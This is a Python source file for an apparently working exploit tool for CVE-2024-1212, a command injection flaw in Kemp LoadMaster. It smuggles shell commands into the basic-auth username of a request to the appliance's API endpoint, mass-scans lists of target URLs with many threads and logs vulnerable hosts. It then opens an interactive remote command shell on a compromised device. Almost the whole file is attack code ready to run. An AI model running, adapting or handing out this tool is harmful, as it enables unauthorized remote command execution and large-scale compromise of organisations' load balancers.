import os import re import argparse import requests import warnings from rich.console import Console from alive_progress import alive_bar from prompt_toolkit import PromptSession, HTML from prompt_toolkit.history import InMemoryHistory from concurrent.futures import ThreadPoolExecutor, as_completed warnings.filterwarnings( "ignore", category=requests.packages.urllib3.exceptions.InsecureRequestWarning ) class LoadMaster: def __init__(self): self.console = Console() self.output_file = None self.verbose = False self.print_ascii() self.parse_arguments() def print_ascii(self): ascii_art = [ "┌────────────────────────────────────────────────────────────────────────────────────────────┐", "│ ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██████╗ ██╗██████╗ │", "│██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ███║╚════██╗███║╚════██╗│", "│██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║ █████╔╝╚██║ █████╔╝│", "│██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║██╔═══╝ ██║██╔═══╝ │", "│╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ██║███████╗ ██║███████╗│", "│ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚══════╝ ╚═╝╚══════╝│", "└────────────────────────────────────────────────────────────────────────────────────────────┘", ] print() for line in ascii_art: self.custom_print(f"[bright_green]{line}[/bright_green]", "+") print() def parse_arguments(self): parser = argparse.ArgumentParser( description="CVE-2024-1212 Command Injection Exploit for Kemp LoadMaster." ) parser.add_argument("-u", "--url", help="Target URL for command injection.") parser.add_argument("-f", "--file", help="File containing target URLs to scan") parser.add_argument("-o", "--output", help="Output file for saving scan results") parser.add_argument( "-t", "--threads", default=50, type=int, help="Number of threads to use for scanning", ) args = parser.parse_args() self.output_file = args.output if args.url: self.verbose = True self.url = args.url if self.check_vulnerability(args.url): self.interactive_shell(args.url) elif args.file: self.scan_from_file(args.file, args.threads) else: parser.print_help() def send_command(self, command, url): command_payload = f"';echo '[S]';{command};echo '[E]';'" try: response = requests.get( url + "/access/set?param=enableapi&value=1", auth=(command_payload, "anything"), verify=False, timeout=20, ) return self.parse_command_output(response.text) except requests.RequestException: return None def parse_command_output(self, response_text): match = re.search(r"\[S\](.*?)\[E\]", response_text, re.DOTALL) if match: return match.group(1).strip() else: return None def check_vulnerability(self, url): hostname = self.send_command("hostname", url) if hostname: message = f"Vulnerable | {url:^30} | CVE-2024-1212 | {hostname:^30}" self.custom_print(message, "+") if self.output_file: with open(self.output_file, "a") as file: file.write(f"{url}\n") return True else: if self.verbose: self.custom_print( f"System at {url} is not vulnerable, or the command produced no output.", "-", ) return False def scan_from_file(self, target_file, threads): if not os.path.exists(target_file): self.custom_print(f"File not found: {target_file}", "-") return with open(target_file, "r") as file: urls = [line.strip() for line in file if line.strip()] if not urls: self.custom_print("No URLs found in the file.", "-") return with alive_bar( len(urls), title="Scanning Targets", bar="smooth", enrich_print=False ) as bar: with ThreadPoolExecutor(max_workers=threads) as executor: futures = [ executor.submit(self.check_vulnerability, url) for url in urls ] for future in as_completed(futures): bar() def split_commands(self, cmd_input): """ Splits multiline input into shell-safe command chunks. Each line is considered a separate command unless it contains shell chaining. """ commands = [] buffer = "" for line in cmd_input.splitlines(): stripped = line.strip() if not stripped: continue buffer += stripped # If the line ends with a shell chaining operator or is clearly a compound line if re.search(r"(;|&&|\|\|)\s*$", stripped): continue # wait for next line # Complete command commands.append(buffer) buffer = "" if buffer: commands.append(buffer) return commands def interactive_shell(self, url): session = PromptSession(history=InMemoryHistory(), multiline=False) self.custom_print("Interactive shell is ready. Type your commands. Use 'exit' to quit.", "!") while True: try: cmd_input = session.prompt(HTML("# ")) if cmd_input.strip().lower() == "exit": break elif cmd_input.strip().lower() == "clear": self.console.clear() continue commands = self.split_commands(cmd_input) for command in commands: result = self.send_command(command, url) print(result if result else "No output.", "\n") except KeyboardInterrupt: break def custom_print(self, message: str, header: str) -> None: header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"} self.console.print( f"[bold {header_colors.get(header, 'white')}][{header}][/bold {header_colors.get(header, 'white')}] {message}" ) if __name__ == "__main__": LoadMaster()